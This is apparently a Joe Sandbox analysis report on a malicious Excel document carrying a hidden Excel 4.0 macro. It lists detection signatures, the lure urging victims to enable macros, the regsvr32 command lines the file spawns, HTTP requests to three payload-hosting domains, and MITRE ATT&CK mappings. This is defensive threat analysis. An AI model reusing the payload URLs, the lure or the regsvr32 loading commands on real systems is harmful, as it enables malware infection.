Loading ...

Play interactive tourEdit tour

Windows Analysis Report doc-220808714.xls

Overview

General Information

Sample Name:doc-220808714.xls
Analysis ID:501226
MD5:2654fdca7197f542cbd0be823a2a2a9f
SHA1:149b43a5f8f4d9bd63720b408f6c4e2a86401c6a
SHA256:f5a313c5353ae0d1cede7bd5e234bfd3a4d7abb5e877bd2903d8d7572e9ee4d6
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Sigma detected: Regsvr32 Command Line Without DLL
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 508 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1212 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1444 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2792 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
doc-220808714.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x384aa:$s1: Excel
  • 0x39557:$s1: Excel
  • 0x34eb:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
doc-220808714.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Regsvr32 Command Line Without DLLShow sources
    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 508, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, ProcessId: 1212
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 508, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, ProcessId: 1212

    Jbx Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: doc-220808714.xlsVirustotal: Detection: 13%Perma Link
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: unknownHTTPS traffic detected: 172.93.99.178:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 101.0.112.4:443 -> 192.168.2.22:49166 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.179.242.179:443 -> 192.168.2.22:49167 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.93.99.178:443
    Source: global trafficDNS query: name: ohemaa.org
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 172.93.99.178:443
    Source: global trafficHTTP traffic detected: GET /HUVm9mDKLW9C/ocrafhh.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ohemaa.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xnkpOLnvlN6T/ocrafh.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: madieandme.com.auConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xdOMlaB0XJ7/ocraf.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: amerident.com.doConnection: Keep-Alive
    Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
    Source: Joe Sandbox ViewIP Address: 172.93.99.178 172.93.99.178
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
    Source: regsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
    Source: regsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
    Source: regsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
    Source: regsvr32.exe, 00000003.00000002.465159036.0000000004BC7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436956137.0000000004B47000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.449435902.0000000004A27000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
    Source: regsvr32.exe, 00000003.00000002.465159036.0000000004BC7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436956137.0000000004B47000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.449435902.0000000004A27000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
    Source: regsvr32.exe, 00000003.00000002.464219880.0000000003B40000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436153792.0000000003A40000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
    Source: regsvr32.exe, 00000003.00000002.463583837.0000000001D80000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.435414226.0000000001CC0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: regsvr32.exe, 00000003.00000002.465159036.0000000004BC7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436956137.0000000004B47000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.449435902.0000000004A27000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
    Source: regsvr32.exe, 00000003.00000002.465159036.0000000004BC7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436956137.0000000004B47000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.449435902.0000000004A27000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
    Source: regsvr32.exe, 00000003.00000002.464219880.0000000003B40000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436153792.0000000003A40000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.448307435.0000000003A50000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
    Source: regsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
    Source: regsvr32.exe, 00000003.00000002.465159036.0000000004BC7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436956137.0000000004B47000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.449435902.0000000004A27000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
    Source: regsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
    Source: regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ocrafhh[1].htmJump to behavior
    Source: unknownDNS traffic detected: queries for: ohemaa.org
    Source: global trafficHTTP traffic detected: GET /HUVm9mDKLW9C/ocrafhh.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ohemaa.orgConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xnkpOLnvlN6T/ocrafh.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: madieandme.com.auConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /xdOMlaB0XJ7/ocraf.html HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: amerident.com.doConnection: Keep-Alive
    Source: unknownHTTPS traffic detected: 172.93.99.178:443 -> 192.168.2.22:49165 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 101.0.112.4:443 -> 192.168.2.22:49166 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 108.179.242.179:443 -> 192.168.2.22:49167 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing 18 '9 41' I 20 (D PROTECTED VIEW Be careful- files from the 1nterne :cted View.
    Source: Screenshot number: 4Screenshot OCR: Enable Content 25 26 (i) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 3
    Source: Screenshot number: 8Screenshot OCR: Enable Editing 18 19 I OK I 20 (D PROTECTED VIEW Be careful- files from the 1nterne :cted View.
    Source: Screenshot number: 8Screenshot OCR: Enable Content 25 26 (i) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 3
    Source: Document image extraction number: 0Screenshot OCR: Enable Editing 0 PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless yo
    Source: Document image extraction number: 0Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
    Source: Document image extraction number: 1Screenshot OCR: Enable Editing (D PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
    Source: Document image extraction number: 1Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
    Source: doc-220808714.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: doc-220808714.xlsOLE indicator, VBA macros: true
    Source: doc-220808714.xlsVirustotal: Detection: 13%
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: doc-220808714.xlsOLE indicator, Workbook stream: true
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.testJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.testJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.testJump to behavior
    Source: regsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREB19.tmpJump to behavior
    Source: classification engineClassification label: mal76.expl.winXLS@7/0@3/3
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 1848Thread sleep count: 39 > 30Jump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 2408Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 1068Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\System32\regsvr32.exe TID: 1960Thread sleep time: -60000s >= -30000sJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: doc-220808714.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1Path InterceptionProcess Injection1Disable or Modify Tools1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer2SIM Card SwapCarrier Billing Fraud

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    doc-220808714.xls13%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    ohemaa.org0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://ohemaa.org/HUVm9mDKLW9C/ocrafhh.html0%Avira URL Cloudsafe
    http://www.icra.org/vocabulary/.0%URL Reputationsafe
    https://madieandme.com.au/xnkpOLnvlN6T/ocrafh.html0%Avira URL Cloudsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe
    https://amerident.com.do/xdOMlaB0XJ7/ocraf.html0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    ohemaa.org
    172.93.99.178
    truefalseunknown
    amerident.com.do
    108.179.242.179
    truefalse
      unknown
      madieandme.com.au
      101.0.112.4
      truefalse
        unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://ohemaa.org/HUVm9mDKLW9C/ocrafhh.htmlfalse
        • Avira URL Cloud: safe
        unknown
        https://madieandme.com.au/xnkpOLnvlN6T/ocrafh.htmlfalse
        • Avira URL Cloud: safe
        unknown
        https://amerident.com.do/xdOMlaB0XJ7/ocraf.htmlfalse
        • Avira URL Cloud: safe
        unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkregsvr32.exe, 00000003.00000002.465159036.0000000004BC7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436956137.0000000004B47000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.449435902.0000000004A27000.00000002.00020000.sdmpfalse
          high
          http://www.windows.com/pctv.regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmpfalse
            high
            http://investor.msn.comregsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmpfalse
              high
              http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmpfalse
                high
                http://www.icra.org/vocabulary/.regsvr32.exe, 00000003.00000002.465159036.0000000004BC7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436956137.0000000004B47000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.449435902.0000000004A27000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000003.00000002.464219880.0000000003B40000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436153792.0000000003A40000.00000002.00020000.sdmpfalse
                  high
                  http://investor.msn.com/regsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmpfalse
                    high
                    http://www.%s.comPAregsvr32.exe, 00000003.00000002.464219880.0000000003B40000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436153792.0000000003A40000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.448307435.0000000003A50000.00000002.00020000.sdmpfalse
                    • URL Reputation: safe
                    low
                    http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000003.00000002.465159036.0000000004BC7000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436956137.0000000004B47000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.449435902.0000000004A27000.00000002.00020000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.hotmail.com/oeregsvr32.exe, 00000003.00000002.464813777.00000000049E0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.436680333.0000000004960000.00000002.00020000.sdmpfalse
                      high
                      http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.463583837.0000000001D80000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.435414226.0000000001CC0000.00000002.00020000.sdmpfalse
                      • Avira URL Cloud: safe
                      low

                      Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public

                      IPDomainCountryFlagASNASN NameMalicious
                      101.0.112.4
                      madieandme.com.auAustralia
                      55803DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAUfalse
                      108.179.242.179
                      amerident.com.doUnited States
                      46606UNIFIEDLAYER-AS-1USfalse
                      172.93.99.178
                      ohemaa.orgUnited States
                      23470RELIABLESITEUSfalse

                      General Information

                      Joe Sandbox Version:33.0.0 White Diamond
                      Analysis ID:501226
                      Start date:12.10.2021
                      Start time:17:12:45
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 6m 46s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:doc-220808714.xls
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of analysed new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal76.expl.winXLS@7/0@3/3
                      EGA Information:Failed
                      HDC Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .xls
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Found warning dialog
                      • Click Ok
                      • Found warning dialog
                      • Click Ok
                      • Attach to Office via COM
                      • Scroll down
                      • Close Viewer
                      Warnings:
                      Show All
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      17:13:29API Interceptor217x Sleep call for process: regsvr32.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      108.179.242.179414d46ac_by_Libranalysis.xlsGet hashmaliciousBrowse
                        414d46ac_by_Libranalysis.xlsGet hashmaliciousBrowse
                          172.93.99.178430#U0437.jsGet hashmaliciousBrowse
                          • globalawardscheme.com/wp-content/cache/nextend/web/combined/sserv.jpg
                          430#U0437.jsGet hashmaliciousBrowse
                          • globalawardscheme.com/wp-content/cache/nextend/web/combined/sserv.jpg
                          34029.docGet hashmaliciousBrowse
                          • justevolvewithgrace.com/cgi-sys/suspendedpage.cgi
                          http://51.254.121.123/wp-content/0AR/com/USGet hashmaliciousBrowse
                          • justevolvewithgrace.com/cgi-sys/suspendedpage.cgi
                          8590170.docGet hashmaliciousBrowse
                          • justevolvewithgrace.com/cgi-sys/suspendedpage.cgi

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          amerident.com.do414d46ac_by_Libranalysis.xlsGet hashmaliciousBrowse
                          • 108.179.242.179
                          414d46ac_by_Libranalysis.xlsGet hashmaliciousBrowse
                          • 108.179.242.179

                          ASN

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          DIGITALPACIFIC-AUDigitalPacificPtyLtdAustraliaAUITT - PPCL-2021-0515-PKG4 - pipping and drilling Services.docGet hashmaliciousBrowse
                          • 116.90.56.138
                          Inquiry-Doors.exeGet hashmaliciousBrowse
                          • 101.0.91.38
                          product specification.exeGet hashmaliciousBrowse
                          • 101.0.117.102
                          7PUgGUWM2lGet hashmaliciousBrowse
                          • 182.160.170.135
                          Attached Quotation.exeGet hashmaliciousBrowse
                          • 101.0.117.102
                          Cd9EA600XXdm0tl.exeGet hashmaliciousBrowse
                          • 101.0.117.102
                          E8ljMuBj9LGet hashmaliciousBrowse
                          • 111.67.13.18
                          QcXQmNSaSpGet hashmaliciousBrowse
                          • 49.156.27.62
                          arm7Get hashmaliciousBrowse
                          • 111.67.13.28
                          QYUNlRkkn1.exeGet hashmaliciousBrowse
                          • 203.16.60.34
